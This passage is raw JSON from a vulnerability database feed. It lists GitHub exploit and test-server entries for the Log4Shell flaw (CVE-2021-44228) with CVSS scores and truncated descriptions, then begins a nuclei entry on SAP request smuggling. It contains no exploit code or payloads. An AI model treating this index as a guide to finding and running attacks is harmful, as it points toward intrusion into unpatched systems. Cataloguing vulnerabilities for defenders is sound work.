Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T12:29:12", "id": "C9E3963C-74AF-51D2-ACF7-7687E92D049F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:57:24", "description": "# CVE-2021-44228-Test-Server\nA small server for verifing if a gi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T12:35:30", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-08-04T05:22:46", "id": "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-09T20:21:54", "description": "# CVE-2021-44228 DFIR-Notes\n\nDriving home I got my first message...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T22:19:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-09T20:08:07", "id": "22C736D4-4179-585F-990B-A40436F65461", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:50:27", "description": "# log4py\npythonic pure python RCE exploit for CVE-2021-44228 log...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T22:55:25", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-11-09T18:14:43", "id": "24751999-698F-5052-988C-193144F85A39", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-07T06:33:15", "description": "# CVE-2021-44228(Apache Log4j Remote Code Execution\uff09\n\n> [all log...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-09T15:27:38", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-12-03T12:35:00", "id": "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:38:21", "description": "# Test exploit of CVE-2021-44228 (log4shell)\n\n### Preparation\n\n`...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T01:50:22", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-23T13:48:51", "id": "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:41:30", "description": "# Security Log4J Tester\n\nA vulnerability in Apache Log4j, a wide...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T14:46:08", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T15:04:49", "id": "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:53:40", "description": "# Sample Log4j2 vulnerable application (CVE-2021-44228) \n# Versi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T13:00:38", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T04:00:49", "id": "D813949A-183D-55ED-AF64-B130B8F95A56", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "nuclei": [{"lastseen": "2023-12-06T22:36:44", "description": "SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-25T00:00:00", "type": "nuclei", "title": "SAP Memory Pipes (MPI) Desynchronization", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cv